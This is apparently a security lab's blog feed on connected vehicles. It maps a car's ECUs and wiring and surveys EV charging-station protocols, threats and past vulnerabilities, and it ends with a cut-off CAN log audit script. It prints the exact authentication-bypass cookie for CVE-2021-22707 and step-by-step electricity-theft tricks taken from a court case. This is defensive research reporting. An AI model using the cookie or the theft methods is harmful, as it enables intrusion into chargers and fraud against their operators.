href="#BCM-车身控制模块" class="headerlink" title="BCM Body Control Module"></a>BCM Body Control Module</h5><p>The BCM (Body Control Module) handles power windows, central locking, remote anti-theft, lighting, power mirror (heating) control, instrument backlight dimming, power distribution and more.</p><p><img src="image-20211112000231431.png" alt="image-20211112000231431"></p><p><img src="image-20211112000835375.png" alt="image-20211112000835375"></p><h5 id="PEPS-无钥匙进入与一键启动"><a href="#PEPS-无钥匙进入与一键启动" class="headerlink" title="PEPS Keyless Entry and Push-Button Start"></a>PEPS Keyless Entry and Push-Button Start</h5><p>PEPS (Passive Entry Passive Start) consists of a controller, the RF transmitter in the smart key and the receiver in the vehicle. When the key is in range and the owner pulls a door handle or presses the start button, the corresponding module sends an interrupt to wake the main controller and the communication sequence begins. The door can be opened or the engine started without using the key. The main components are the key fob, antennas and the body control module (BCM); the core technologies are RFID identification, cryptographic algorithms and EMC.</p><p>The keyless-entry connector shows two sets of antennas, used to detect whether the key is nearby. When the key is within range, the doors are set to openable.</p><p><img src="image-20211111233345398.png" alt="image-20211111233345398"></p><p>The SSB (Start Stop Button), commonly called the ignition button, starts the engine.</p><p><img src="image-20211111232400288.png" alt="image-20211111232400288"></p><p>Integrated PEPS + BCM designs have also appeared.</p><p><img src="image-20211113234220158.png" alt="image-20211113234220158"></p><h5 id="TPMS-胎压检测"><a href="#TPMS-胎压检测" class="headerlink" title="TPMS Tire-Pressure Monitoring"></a>TPMS Tire-Pressure Monitoring</h5><p>TPMS (Tire Pressure Monitoring System) is an active safety system using wireless transmission at 433.92 MHz. Highly sensitive miniature wireless sensors fixed inside the tires collect pressure, temperature and other data while driving or stationary and send it to a display in the cabin, which shows tire pressure and temperature in real time and warns the driver with a buzzer or voice alert when a tire is abnormal (to prevent blow-outs). Keeping pressure and temperature within the standard range reduces the chance of blow-outs and tire damage, and lowers fuel consumption and wear on vehicle components. The central monitor receives the signals from the TPMS sensor modules and displays each tire's pressure and temperature for the driver; if either is abnormal it raises an alarm so that the driver can act.</p><p>The tire-pressure data the TPMS collects is passed over EBUS CAN to other ECUs.</p><p><img src="image-20211111233735818.png" alt="image-20211111233735818"></p><h5 id="PAS-泊车辅助雷达"><a href="#PAS-泊车辅助雷达" class="headerlink" title="PAS Parking-Assist Radar"></a>PAS Parking-Assist Radar</h5><p>PAS (<em>Parking</em> Assist System) uses reversing radar to help the driver park in tight spaces, indicating the distance to obstacles with audible signals and graphics on the central display.</p><p><img src="image-20211111234419237.png" alt="image-20211111234419237"></p><h5 id="AVM-全景摄像模块"><a href="#AVM-全景摄像模块" class="headerlink" title="AVM Around-View Camera Module"></a>AVM Around-View Camera Module</h5><p>AVM (Around View Monitor) captures images with several ultra-wide-angle fisheye lenses, then corrects distortion and stitches them into a surround view, giving the driver a top-down image of the car's surroundings, eliminating blind spots and providing effective visual aid when parking. Its main interfaces are turn-signal, camera video and power.</p><p><img src="image-20211111230713168.png" alt="image-20211111230713168"></p><h5 id="SDM-安全气囊控制器"><a href="#SDM-安全气囊控制器" class="headerlink" title="SDM Airbag Controller"></a>SDM Airbag Controller</h5><p>The SDM airbag controller manages the airbags and seat belts.</p><p><img src="image-20211111234950790.png" alt="image-20211111234950790"></p><h5 id="ESCL-转向柱锁"><a href="#ESCL-转向柱锁" class="headerlink" title="ESCL Steering Column Lock"></a>ESCL Steering Column Lock</h5><p>The ESCL (Electronic Steering Column Lock) is part of the vehicle's anti-theft system and locks and unlocks the steering wheel in a keyless entry/keyless start system. Locking and unlocking are performed by driving the motor inside the ESCL. The safety level of an ESCL product has to be assessed and calculated according to the vehicle architecture and ISO 26262, and it must also meet the regulations of different countries and regions (such as GB 15740 and ECE R116).</p><p><img src="image-20211111232117359.png" alt="image-20211111232117359"></p><h5 id="DVR-行车记录仪"><a href="#DVR-行车记录仪" class="headerlink" title="DVR Dash Camera"></a>DVR Dash Camera</h5><p>The DVR dash camera is also connected to the EBUS CAN.</p><p><img src="image-20211111235251029.png" alt="image-20211111235251029"></p><h4 id="其他"><a href="#其他" class="headerlink" title="Other"></a>Other</h4><h5 id="后排标准USB接口"><a href="#后排标准USB接口" class="headerlink" title="Rear Standard USB Port"></a>Rear Standard USB Port</h5><p>The rear standard USB port has only power pins and no data pins, whereas the front USB ports are mostly full-function ports that both charge and transfer data.</p><p><img src="image-20211112131248725.png" alt="image-20211112131248725"></p><h5 id="点烟器"><a href="#点烟器" class="headerlink" title="Cigarette Lighter"></a>Cigarette Lighter</h5><p>I had always wondered whether the cigarette lighter had any special function; seeing only power pins, I was clearly overthinking it.</p><p><img src="image-20211112131454826.png" alt="image-20211112131454826"></p><h5 id="PEU-电机控制器"><a href="#PEU-电机控制器" class="headerlink" title="PEU Motor Controller"></a>PEU Motor Controller</h5><p>The core technologies of a new-energy vehicle are the "three electrics": motor, motor control and battery. The motor controller is the central control device for the motor's start, running, direction, speed and stop, as well as other electronics. The PEU motor controller is connected to both the EVBUS energy domain and the CBUS chassis domain.</p><h3 id="网络拓扑"><a href="#网络拓扑" class="headerlink" title="Network Topology"></a>Network Topology</h3><p>Using the communication interfaces on each ECU's connector, the ECUs on the same network domain are chained together and the different networks placed side by side. The ECUs were already classified above, so all that remains is to draw it; the result is below.</p><p><img src="网络拓扑-北汽EU5 网络结构.png" alt="网络拓扑-北汽EU5 网络结构"></p><p>The whole network is centered on the gateway and has 8 sub-networks: the telematics network, diagnostics network, energy domain, fast-charging network, chassis domain, infotainment domain, body domain and the LIN bus network.</p><h3 id="整车线束"><a href="#整车线束" class="headerlink" title="Vehicle Wiring Harness"></a>Vehicle Wiring Harness</h3><p>Having mapped the network from the connectors, let us return to the car itself. The vehicle network is connected by wiring harnesses, and every connector ends up on a harness, so it is worth understanding the whole-vehicle harness.</p><p>The wiring harness is the backbone of the vehicle's electrical circuits; without harnesses there are no circuits. A harness is an assembly of stamped copper contact terminals (connectors) crimped onto wires and cables, then overmolded with insulation or enclosed in metal housings, and bundled together to form the connecting circuits.</p><ul><li><strong>Front compartment harness:</strong> routed in the front compartment and used to connect the body control systems. It joins the instrument panel, PEU, front-end, front bumper and body harnesses. The ABS, BMS, PEU, lamps, front wiper/washer system, power supply, central electrical box and accelerator pedal are in the front compartment.</li><li><strong>Instrument panel harness:</strong> routed in the dashboard area and used to connect the driving, entertainment and air-conditioning electrics. It joins the front compartment, body, roof and AC harnesses. The instrument cluster, audio head unit, center panel, center display, speakers, OBD diagnostic port, ESP, ESCL steering column lock, combination light switch, power mirrors, gateway, cigarette lighter, P-gear controller, ESK rotary gear selector, start button, driver/passenger airbags, TPMS, BCM, foot and defrost ducts, and trunk and C2L switches are on the instrument panel harness.</li><li><strong>Body harness:</strong> routed through the body, the backbone of the vehicle's harnesses; joins the front compartment, instrument panel, front bumper, rear bumper and seat harnesses. The TBOX, EPB, pedestrian warning switch, GPS, CMU AC socket control unit, trunk antenna, trunk lock motor, trunk lamp, reversing radar module, left/right side airbags, left/right rear combination lamps, left/right curtain airbags, high-mounted brake light, rear USB ports, rear camera and AVM around-view module are on the body harness.</li><li><strong>Front-end harness:</strong> routed at the front of the vehicle and joined to the front compartment harness. The horn, left/right crash sensors, DC-CHM, hood lock and pedestrian warning device are on it.</li><li><strong>PEU (power electronics unit) harness:</strong> joined to the front compartment harness; the P-gear motor, motor water pump controller, vacuum pump power, vacuum pump controller and battery-positive starter are on it.</li><li><p><strong>Front bumper harness:</strong> joined to the front compartment harness; the fast-charge port lock, front camera and left/right daytime running lights are on it.</p></li><li><p><strong>Rear bumper harness:</strong> joined to the body harness; the center/rear radar and rear fog lights are on it.</p></li><li><p><strong>Door harness:</strong> each door has its own. It joins the body harness; the speaker, mirror, window switch, window motor, door lock assembly and door handle switch are on it.</p></li><li><p><strong>Roof harness:</strong> joined to the instrument panel harness; the dash camera, dome lights, ADAS front camera, sunroof and rain sensor are on it.</p></li><li><strong>AC harness:</strong> the harness for the air conditioning, joining the vehicle harness through the instrument panel harness. The evaporator temperature sensor, recirculation motor, mode motor and blend blower are on it.</li><li><strong>Seat harness:</strong> routed in the seat area for seat height adjustment, heating and so on, joining the vehicle harness through the body harness. The seat heater controller, heating elements, and the height, fore/aft and backrest adjustment motors are on it.</li></ul><p>The reference positions of the harnesses are shown below.</p><p><img src="image-20211111150913360.png" alt="image-20211111150913360"></p><h3 id="插线端子在车联网安全上的思考"><a href="#插线端子在车联网安全上的思考" class="headerlink" title="Thoughts on Connectors and Connected-Vehicle Security"></a>Thoughts on Connectors and Connected-Vehicle Security</h3><p>In a black-box setting, physical analysis of a component usually starts at its connector, and the first step is finding the power pins; only once the part is powered does the real research begin. Cataloguing the common connectors of each ECU simplifies that process and frees effort for deeper vulnerability research.</p><p>Connectors also reveal weak entry points. Take the DVR dash camera: its connector shows it sits on the body-domain CAN. So the dash camera can be a starting point: once the DVR is compromised, the attacker is on the body domain, where the BCM also sits, and the BCM controls the doors and lights. This logical path to vehicle control has not received wide attention; the focus is on the cloud, the TBOX or the IVI. Xingyu Lab is actively exploring this path through the dash camera, and we have already obtained system privileges on one vehicle's dash camera contactlessly through a previously unknown vulnerability.</p><p>We have other ideas from studying connectors too. Everyone is welcome to research and discuss connected-vehicle security with us and help keep travel safe.</p><h3 id="参考"><a href="#参考" class="headerlink" title="References"></a>References</h3><ul><li><a href="https://delikely.github.io/2021/08/15/TBOX-Main-Function/">Connected-Vehicle Security Basics: TBOX Main Functions</a></li><li><a href="https://mp.weixin.qq.com/s/d-GcMiI51ugrnvSfQScL-A">Analysis of the in-vehicle network structure of the BAIC EV200 / BYD Tang / BYD e6</a></li><li><a href="https://zhuanlan.zhihu.com/p/149932069">A thorough introduction to the BMS battery management system</a></li><li><a href="https://mp.weixin.qq.com/s/6bZ2KGoMF307etKGGMnGjA">SAIC Passenger Vehicle: body domain control system development practice</a></li><li><a href="https://www.doc88.com/p-17347380206512.html">Integrated PEPS/BCM keyless system technical solution</a></li><li><a href="https://zhuanlan.zhihu.com/p/57872365">Introduction to keyless entry and start systems (Kessy)</a></li><li><a href="https://www.auto-made.com/news/show-10990.html">Detailed classification of automotive wiring harnesses</a></li><li>BAIC New Energy EU5 repair manual wiring diagrams (from the internet)</li></ul>]]></content>
<summary type="html"><h3 id="前言"><a href="#前言" class="headerlink" title="Preface"></a>Preface</h3><p>The lab plans to tear down a car soon to study how a vehicle is put together. Taking a car apart is easy; putting it back together exactly as it was so that it still runs takes skill. I happened to get hold of a complete</summary>
<category term="Automotive" scheme="http://delikely.github.io/tags/Automotive/"/>
</entry>
<entry>
<title>Connected-Vehicle Security Basics: Charging Infrastructure</title>
<link href="http://delikely.github.io/2021/10/20/Charging-infrastructure/"/>
<id>http://delikely.github.io/2021/10/20/Charging-infrastructure/</id>
<published>2021-10-20T10:14:51.000Z</published>
<updated>2021-11-14T16:33:58.043Z</updated>
<content type="html"><![CDATA[<p>On 30 July the State Council officially promulgated the Regulations on the Security Protection of Critical Information Infrastructure, which shows how seriously the state takes critical-infrastructure security. EV charging facilities are an important part of that infrastructure, and Article 3 of the Provisions on the Management of Automotive Data Security also classifies <code>operating data of vehicle charging networks</code> as important data. Today we look at the security of charging infrastructure.</p><p>Charging infrastructure has its own large supply and service ecosystem, chiefly equipment manufacturers, facility operators and internet platform providers. This article analyzes its security following its structure, covering the basics, security threats and past vulnerabilities.</p><p><img src="充电基础设施供应商.png" alt="充电基础设施供应商"></p><h3 id="充电设施信息交换基础架构"><a href="#充电设施信息交换基础架构" class="headerlink" title="Charging Facility Information Exchange Architecture"></a>Charging Facility Information Exchange Architecture</h3><p>The information exchange architecture for EV charging facilities is shown below; from bottom to top it has four layers: information access, infrastructure, operation services and data sharing.</p><p><strong>Information access layer (EVAC)</strong>: the external access layer that communicates with the charging infrastructure (charging stations), including electric vehicles, QR codes, NFC, smart terminals and so on.</p><p><strong>Infrastructure layer (EVIE)</strong>: mainly the charging stations. By charging type they are AC stations (slow charging) and DC stations (fast charging); by installation they are floor-standing and wall-mounted. This layer is the executor of EV charging: it receives external charging requests from the access layer, processes them and carries out charging or other tasks.</p><p><strong>Operation service layer (EVSOP)</strong>: the direct business layer of the charging cloud, comprising the charging operation platform and the settlement platform.</p><p><strong>Data sharing layer (EVDSS)</strong>: third-party service and management platforms that provide data services and management support to the operation layer.</p><p><img src="image-20210928160341232-16340382000954.png" alt="image-20210928160341232-16340382000954"></p><h3 id="充电桩-机"><a href="#充电桩-机" class="headerlink" title="Charging Station (Charger)"></a>Charging Station (Charger)</h3><p>The charging station (charger) is the front line of the infrastructure, interacting directly with vehicles and users; it sits in the <code>infrastructure layer</code> of the <code>information exchange architecture</code>. Stations can be classified by charging mode, installation method and location, as in the table below.</p><p><img src="image-20210904143228044.png" alt="image-20210904143228044"></p><p>DC stations are the most widely used today. Their basic components are the power unit, control and billing unit, metering unit, charging interface, supply interface and HMI.</p><p><img src="网络拓扑-充电桩.png" alt="网络拓扑-充电桩" style="zoom:39%;" /></p><p>The station takes grid power through its power input, converts it in the power conversion unit to match the vehicle, controls the charging process through the output switching unit and delivers energy to the vehicle via the charging cable and vehicle plug. Throughout, the main control and data exchange is handled by the charge control unit.</p><h4 id="TCU-介绍"><a href="#TCU-介绍" class="headerlink" title="TCU Overview"></a>TCU Overview</h4><p>The charge control and billing unit is abbreviated TCU. It integrates serial, CAN, RS485, SD, Ethernet, SIM slot, audio, LVDS and digital I/O interfaces and supports BeiDou/GPS dual-mode positioning, Bluetooth and 4G all-network communication, providing the station's HMI display, billing and metering, payment, data encryption, control of the charging equipment, communication with the connected-vehicle platform and other business management functions.</p><p><em>Note: the TCU in this article means the control and billing unit that meets the General Technical Specification for Off-Board DC Chargers for Electric Vehicles; it differs somewhat from other types of control and billing unit, which I will cover another time.</em></p><p>The most important control module inside the charger has two parts, business and electrical, linked over the CAN bus. The charge billing control unit and the charge controller exchange charging status, fault information and so on, and the charger controller drives the whole charging process according to the billing control unit.</p><p><strong>Business part:</strong> the TCU connects to the charging operation platform over cellular, Ethernet and so on, receives and executes the platform's commands and uploads local charging data; it connects to the display and input module over LVDS/parallel, the main human-machine interface; the CPU card reader connects over RS232 for charging with stored-value cards; the multifunction meter connects over RS485 to measure the energy consumed; and the TCU also exchanges data with the GNSS antenna, RS232 debug port and other external input modules.</p><p><strong>Electrical part:</strong> the charging equipment controller provides electrical protection, vehicle interaction, AC/DC conversion, environmental control and so on.</p><p><img src="news160323_1.png" alt="充电机内部元器件关系图" style="zoom:70%;" /></p><h4 id="TCU-硬件"><a href="#TCU-硬件" class="headerlink" title="TCU Hardware"></a>TCU Hardware</h4><p>The TCU's SoC is usually ARM-based and runs embedded Linux; it has rich external interfaces and a modular design meeting the General Technical Specification for Off-Board DC Chargers, which defines the external interfaces and functions required. One TCU core board is shown below.</p><p><img src="640.webp" alt="img"></p><p>The TCU enclosure usually labels the purpose of each interface in detail; see the <code>Business part</code> under <code>TCU Overview</code> above.</p><p><img src="tcu.png" alt="img" style="zoom: 80%;" /></p><h3 id="智能充-换电柜"><a href="#智能充-换电柜" class="headerlink" title="Smart Charging/Battery-Swap Cabinets"></a>Smart Charging/Battery-Swap Cabinets</h3><p>Shared charging and battery-swap cabinets for e-bikes relieve the range anxiety of delivery riders and help e-bike users in general. There is currently no unified standard for them, each vendor does its own thing, and there are many security problems. Not long ago we studied one charging cabinet on which any locker door could be opened.</p><p><img src="qiegewala.png" alt="qiegewala" style="zoom:25%;" /></p><h3 id="换电站"><a href="#换电站" class="headerlink" title="Battery Swap Stations"></a>Battery Swap Stations</h3><p><strong>Four hours queuing for one hour of charging</strong> trended during the National Day holiday; EV charging is a long-standing problem. NIO pioneered battery swapping, and the security of swap stations should not be overlooked.</p><h3 id="通信协议"><a href="#通信协议" class="headerlink" title="Communication Protocols"></a>Communication Protocols</h3><p>Having covered the hardware, let us look at the protocols specific to charging networks. This is only a brief introduction; detailed analysis will follow in real cases.</p><p>A series of dedicated protocols runs between vehicle and station, inside the station, between station and operation platform, and between operation platform and third-party service and management platforms; the protocol at each level is shown below.</p><p><img src="网络拓扑-充电基础设施协议.png" alt="网络拓扑-充电基础设施协议" style="zoom:50%;" /></p><h4 id="电动汽车充电机与电池管理系统"><a href="#电动汽车充电机与电池管理系统" class="headerlink" title="EV Charger and Battery Management System"></a>EV Charger and Battery Management System</h4><p><strong>BMS protocol</strong>: used between the EV charger and the BMS (Battery Management System). It is based on CAN at 250 kbit/s, using extended CAN frames with 29-bit identifiers. The addresses are fixed and cannot be changed by any means: the charger address is 86 (56H) and the BMS address is 244 (F4H).</p><h4 id="计费控制单元与充电控制器通信协议"><a href="#计费控制单元与充电控制器通信协议" class="headerlink" title="Billing Control Unit to Charge Controller Protocol"></a>Billing Control Unit to Charge Controller Protocol</h4><p>This protocol specifies CAN communication between the billing control unit and the charge controller. During charging they exchange status and fault information, and the charger controller drives the whole charging process according to the billing control unit. Like the BMS protocol it is based on CAN at 250 kbit/s with 29-bit extended frames and fixed, unchangeable addresses: the billing control unit is 138 (8AH) and the charge controller is 242 (F6H).</p><h4 id="电量计量协议"><a href="#电量计量协议" class="headerlink" title="Energy Metering Protocol"></a>Energy Metering Protocol</h4><p>Communication between the billing control unit and the meter uses DL/T 645, Modbus and similar protocols over RS485. Its main function is measuring the energy delivered, for billing.</p><h4 id="充电机与运营平台协议"><a href="#充电机与运营平台协议" class="headerlink" title="Charger to Operation Platform Protocols"></a>Charger to Operation Platform Protocols</h4><p>These protocols cover charging/swapping service information exchange between operation platforms of different operators, and between operation platforms and third-party service and management platforms. The main services carried are user authentication, asset management, device authentication, charging control and billing-model management.</p><p><img src="image-20210905213636053.png" alt="image-20210905213636053"></p><p>There are many charger-to-platform protocols; the mainstream ones are OCPP, T/CEC 102.4 and the CCTIA charging station to operation platform protocol.</p><p><strong>OCPP: </strong>OCPP is a global open communication standard created mainly to overcome the difficulties of communicating between proprietary charging networks. It supports seamless communication between charge points and the central management systems of various vendors and is used in many countries. It covers the operator's day-to-day operation and maintenance of charging stations: basic charging, firmware updates, reservations, local authorization lists and so on. OCPP supports smart charging under various deployment architectures and is common in international EV-grid integration projects.</p><p><strong>T/CEC 102.4 Part 6:</strong> the China Electricity Council's technical specification for connecting charging/swapping equipment to operation service platforms. It defines the types of information exchanged between equipment and platform and the corresponding flows. The application protocol data unit (APDU) is the transmission unit and the protocol is binary. The data field may be encrypted with TLS, AES, SM7, SM4 or SM1.</p><p><strong>CCTIA charging station to operation platform protocol: </strong>published in 2016 as a charging standard of the China Electric Vehicle Charging Technology and Industry Alliance, drafted by China Potevio, Zhuhai Xiaokele, China Mobile IoT, CTTL and Integrated Electronic Systems Lab among others. The protocol is binary, uses a long-lived socket connection and is encrypted with the SM4 symmetric cipher. Each protocol data unit starts with the fixed value 0x0601 and ends with the fixed value 0x0F02.</p><h4 id="运营服务平台信息交互"><a href="#运营服务平台信息交互" class="headerlink" title="Operation Platform Information Exchange"></a>Operation Platform Information Exchange</h4><p>T/CEC 102.4, Information Exchange for EV Charging Roaming Services, covers authentication and identification, charging information sharing, business data exchange, data encryption and transport security, and other services, with the goal of letting EV users move freely between charging networks. It mainly defines charging/swapping service information exchange between the platforms of different operators, and between platforms and third-party service and management platforms. The services exchanged between platforms include platform authentication, user authentication, device authentication, business policy, charging policy, charging service, charging orders and order reconciliation.</p><p><img src="clip_image002.png" alt="img"></p><p>All data interfaces are HTTP(S), with every URL in the format <code>http(s)://[域名]/evcs/v[版本号]/[接口名称]</code> (domain, version number, interface name). All interfaces send parameters by HTTP(S) POST as JSON, with a message header and a message body. The body consists of the operator identifier (OperatorID), the parameters (Data), a timestamp (TimeStamp), an incrementing sequence number (Seq) and a digital signature (Sig).</p><p>T/CEC 102.4 was drafted mainly by Potevio New Energy, TELD and State Grid, and is widely used by mainstream operators such as State Grid and Potevio New Energy. China submitted it to the IEC as an international standard proposal, which was approved, and it is now an international standard.</p><h3 id="安全威胁"><a href="#安全威胁" class="headerlink" title="Security Threats"></a>Security Threats</h3><p>I have several times hunted charging-station vulnerabilities for large operators and found that today's stations are weakly protected, with many security risks. A national security standard for charging stations is being drafted, but the group standard T/CEC 208-2019, Information Security Technical Specification for EV Charging Facilities, was published two years ago, and I was fortunate to take part in drafting it.</p><p>The main threats to charging infrastructure fall into three categories: charging-station security, communication security and cloud-platform security.</p><h4 id="充电桩安全"><a href="#充电桩安全" class="headerlink" title="Charging Station Security"></a>Charging Station Security</h4><p>Charging stations bear the brunt of attacks on charging infrastructure. Vendors are a mixed bag with uneven security capability, stations are numerous and in direct contact with users, and the attack surface is large.</p><ol><li><p>Weak HMI passwords</p><p>From the HMI you can reach the station's system configuration pages, where all sorts of parameters can be set: network settings, platform address, debugging and so on. Weak passwords are an old story, yet still common.</p></li><li><p>System/application security</p><p>Stations mostly run embedded Linux; the components in use may carry known vulnerabilities and service configurations may be flawed.</p></li><li><p>Hardware security</p><ul><li><p>Unprotected debug interfaces (serial, network ports)</p></li><li><p>Firmware is easy to extract and analyze</p></li></ul></li></ol><h4 id="通信安全"><a href="#通信安全" class="headerlink" title="Communication Security"></a>Communication Security</h4><p>Besides the security of the BMS, OCPP, T/CEC 102.4 and other protocols above, there is the security of on-board protocols such as the RS232 link to the card reader. Most protocols define data encryption, but insecure use of it can still create threats. There may also be business-logic flaws on top of the messages, such as getting free charging or swapping by forging a VIN.</p><h4 id="云平台安全"><a href="#云平台安全" class="headerlink" title="Cloud Platform Security"></a>Cloud Platform Security</h4><p>The ECMP (EV Charging Management Platform) faces much the same risks as any other cloud business platform: web component vulnerabilities, host vulnerabilities, service misconfiguration, logic flaws and so on.</p><p>A compromised cloud platform leaks large amounts of data, including personal information such as names (nicknames), balances and charging history (time and place).</p><h3 id="历史漏洞"><a href="#历史漏洞" class="headerlink" title="Past Vulnerabilities"></a>Past Vulnerabilities</h3><p>The <a href="http://timeline.icvsec.com/">Automotive Cybersecurity Incident Timeline</a> shows charging stations have been compromised many times. Here are three typical cases.</p><ul><li><p><strong>Schneider charging station compromised</strong></p><p>This year security researchers <strong>BaCde</strong> and <strong>Kevin2600 (senior security researcher, Xingyu Lab)</strong> hunted vulnerabilities in Schneider charging stations and ultimately obtained a remote root shell with no user interaction. The results were presented at this year's <a href="https://youtu.be/PW60NXN0qZE">DEFCON</a>. Two of the high-severity vulnerabilities:</p><p><strong>CVE-2021-22707</strong>: the web backend contains a hard-coded value; adding CURLTOKEN=b35fcdc1ea1221e6dd126e172a0131c5a;SESSIONID=admin to the cookie bypasses login authentication and grants administrator access to the web backend.</p><p><strong>CVE-2021-22708</strong>: the firmware signature verification is flawed, so a crafted malicious update package can pass verification. Flashing malicious firmware yields a root shell on the station.</p></li><li><p><strong>Ride-hailing driver jailed for stealing electricity 382 times in six months using the "pinch the plug" and "timing" tricks</strong></p><p>A Beijing ride-hailing driver surnamed Dong exploited a flaw in the State Grid charging app, using the "pinch the plug" and "timing" tricks to charge for free or at a discount, stealing electricity 382 times in six months. The Beijing Daxing District People's Procuratorate charged him with theft and teaching criminal methods; the court sentenced Dong to one year in prison and a fine of 
1000 元。</p><p>“捏枪法”:利用 e充电 APP 扫描充电桩上的二维码,之后支付 0.5 或 1 元,等待数秒后,再将充电枪连接电动车。接着按一下充电枪上的开关,如果充电桩上的充电指示灯亮着表示窃电成功,电桩会给电动车充电且不进行计费。<br>“卡秒法”:利用 e充电 APP 扫描充电桩上的二维码,然后支付 0.5 或 1 元,等数秒后再按插在车上的充电枪开关,充电桩屏幕显示开始计费并且显示秒数,等 10 秒然后点击屏幕的返回键,再用 e充电 扫一遍充电桩上的二维码,如果充电桩的充电指示灯亮着表示窃电成功,反之意味着窃电失败,需要重新尝试。</p></li><li><p><strong>卡巴斯基发现 ChargePoint 家用充电桩多个漏洞</strong></p><p>2018 年卡巴斯基在 ChargePoint 的家用充电桩上发现多个漏洞,允许远程攻击者调整充电电流以及随时停止汽车的充电过程,从而导致潜在的物理损坏和经济损失。该家用充电站支持 WiFi 和蓝牙无线技术,用户可通过 iOS 及 Android 平台的移动应用程序远程控制充电过程。研究人员发现该设备的 Web 服务器存在证书安全问题、缓冲区溢出等漏洞。</p></li></ul><h3 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h3><p>本文介绍了充电基础设施的架构与通信协议,总结了充电基础设施面临的安全风险,列举了充电桩被攻陷的案例。</p><p>星舆车联网安全实验室致力于车联网安全研究。实验室近期发现某充电控制计费单元存在多个漏洞,综合利用我们挖掘的这些漏洞可以实现免费充电。漏洞被滥用,会给充电桩运营企业带来巨大的损失。漏洞涉及多个品牌的充电桩,属于供应链漏洞。通过网络设备搜索引擎检索发现有1万多个充电桩暴露在公网中。当前我们已联系相关责任方,后续会遵循负责披露的原则公布我们的研究成果。充电柜的漏洞也在积极与厂商接触中。</p><h3 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h3><ul><li><p><a href="http://timeline.icvsec.com/">汽车信息安全事件时间轴</a></p></li><li><p><a href="https://www.cec.org.cn/upload/file/biaozhunhua/zhongdianlianbiaozhun/2019-09-29/508a7dfb58b92835782493dba29c5b54.pdf">电动汽车充电设施信息安全技术规范 </a></p></li><li><p><a href="https://www.sohu.com/a/243598761_180520">新能源汽车充电桩配套供应商大全</a></p></li><li><p><a href="https://www.forlinx.com/dianli/227.html">充电桩解决方案-充电桩计费控制单元</a></p></li><li><p><a href="https://mp.weixin.qq.com/s/EmI1mYwrEJWO1Ip2JXx_SQ">想参与国家电网充电桩招标?那可不能没有它。</a></p></li><li><p><a href="https://max.book118.com/html/2021/0104/8052047033003034.shtm">《CCTIA-充电桩与运营平台通讯协议》</a></p></li><li><p><a href="https://www.cec.org.cn/upload/file/biaozhunhua/zhongdianlianbiaozhun/2019-09-29/508a7dfb58b92835782493dba29c5b54.pdf">《T/CEC 208—2019 电动汽车充电设施信息安全技术规范》</a></p></li><li><p>《NB/T 33001-2010:电动汽车非车载传导式充电机技术条件》</p></li><li><p>《非车载整车直流充电机通用技术规范》</p></li><li><p>《GB/T 27930-2015 电动汽车非车载传导式充电机与电池管理系统之间的通信协议》</p></li><li><p>《T/CEC 102.4-2016 电动汽车充换电服务信息交换》</p></li></ul>]]></content>
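The two CAN links described above (charger to BMS, and billing control unit to charging controller) both use 29-bit extended identifiers with fixed node addresses. The following Python is an added example written for this page; it is not code from the original post nor from the standards it cites. It builds and parses identifiers in the SAE J1939 layout that GB/T 27930 follows, and audits a candump-style capture against the fixed addresses the post gives (0x56/0xF4 and 0x8A/0xF6). The PGN values and the capture lines are constructed for illustration and are not taken from the standard text.

```python
import re

# Fixed node addresses quoted in the post (charger/BMS link and the
# billing-control-unit/charging-controller link).
CHARGER = 0x56
BMS = 0xF4
TCU = 0x8A              # billing control unit
CHARGE_CONTROLLER = 0xF6

# Each link is point-to-point between exactly two fixed addresses.
LINKS = {
    "charger-bms": (CHARGER, BMS),
    "tcu-controller": (TCU, CHARGE_CONTROLLER),
}


def build_id(priority, pgn, dest, src):
    """Assemble a 29-bit J1939-style identifier.

    Layout, most significant first: 3 priority bits, reserved bit, data page
    bit, PDU format (PF), PDU specific (PS) and source address.  For PF below
    240 (PDU1) PS is the destination address; for PF of 240 and above (PDU2)
    PS is the group extension and the frame is a broadcast.
    """
    if priority not in range(8) or pgn not in range(0x20000):
        raise ValueError("priority must be 0-7 and PGN 0-0x1FFFF")
    if dest not in range(256) or src not in range(256):
        raise ValueError("addresses are single bytes")
    dp, rest = divmod(pgn, 0x10000)       # data page bit is bit 16 of the PGN
    pf, group_ext = divmod(rest, 256)
    ps = group_ext if pf >= 240 else dest
    # Top byte holds priority (3 bits), reserved bit (0) and data page bit.
    return int.from_bytes(bytes([priority * 4 + dp, pf, ps, src]), "big")


def parse_id(can_id):
    """Split a 29-bit identifier into priority, PGN, destination and source."""
    hi, pf, ps, src = can_id.to_bytes(4, "big")   # OverflowError above 32 bits
    if hi >= 0x20:
        raise ValueError("identifier does not fit in 29 bits")
    priority, flags = divmod(hi, 4)
    _reserved, dp = divmod(flags, 2)
    if pf >= 240:                                  # PDU2: broadcast, PS is part of the PGN
        pgn, dest = dp * 0x10000 + pf * 256 + ps, 0xFF
    else:                                          # PDU1: PS is the destination address
        pgn, dest = dp * 0x10000 + pf * 256, ps
    return {"priority": priority, "pgn": pgn, "dest": dest, "src": src}


def classify_frame(can_id, link):
    """Return 'ok' when src and dest are the two fixed nodes of the link, else a reason."""
    frame = parse_id(can_id)
    nodes = LINKS[link]
    if frame["src"] not in nodes:
        return f"foreign-source:{frame['src']:02X}"
    if frame["dest"] == 0xFF:
        return "broadcast"               # the links above are point-to-point; report, do not accept
    if frame["dest"] not in nodes or frame["dest"] == frame["src"]:
        return f"bad-destination:{frame['dest']:02X}"
    return "ok"


# candump-style line: "can0  1826F456   [8]  01 00 00 00 00 00 00 00"
CANDUMP_LINE = re.compile(
    r"^\s*(\S+)\s+([0-9A-Fa-f]{3,8})\s+\[(\d)\]\s*((?:[0-9A-Fa-f]{2}\s*)*)$"
)


def parse_candump_line(line):
    """Return (interface, identifier text, identifier, payload) for one candump line."""
    match = CANDUMP_LINE.match(line)
    if match is None:
        raise ValueError(f"unrecognised candump line: {line!r}")
    iface, ident_hex, dlc, payload = match.groups()
    data = bytes.fromhex(payload)                  # fromhex ignores the spaces
    if len(data) != int(dlc):
        raise ValueError(f"DLC {dlc} does not match {len(data)} payload bytes")
    return iface, ident_hex.upper(), int(ident_hex, 16), data


def audit_candump(text, link):
    """Classify every frame of a candump capture against one link's fixed addresses."""
    results = []
    for line in text.splitlines():
        if not line.strip():
            continue
        _iface, ident_hex, can_id, _data = parse_candump_line(line)
        # candump prints 8 hex digits for extended (29-bit) identifiers and
        # 3 for standard (11-bit) ones; both charger protocols use extended only.
        verdict = classify_frame(can_id, link) if len(ident_hex) == 8 else "not-extended"
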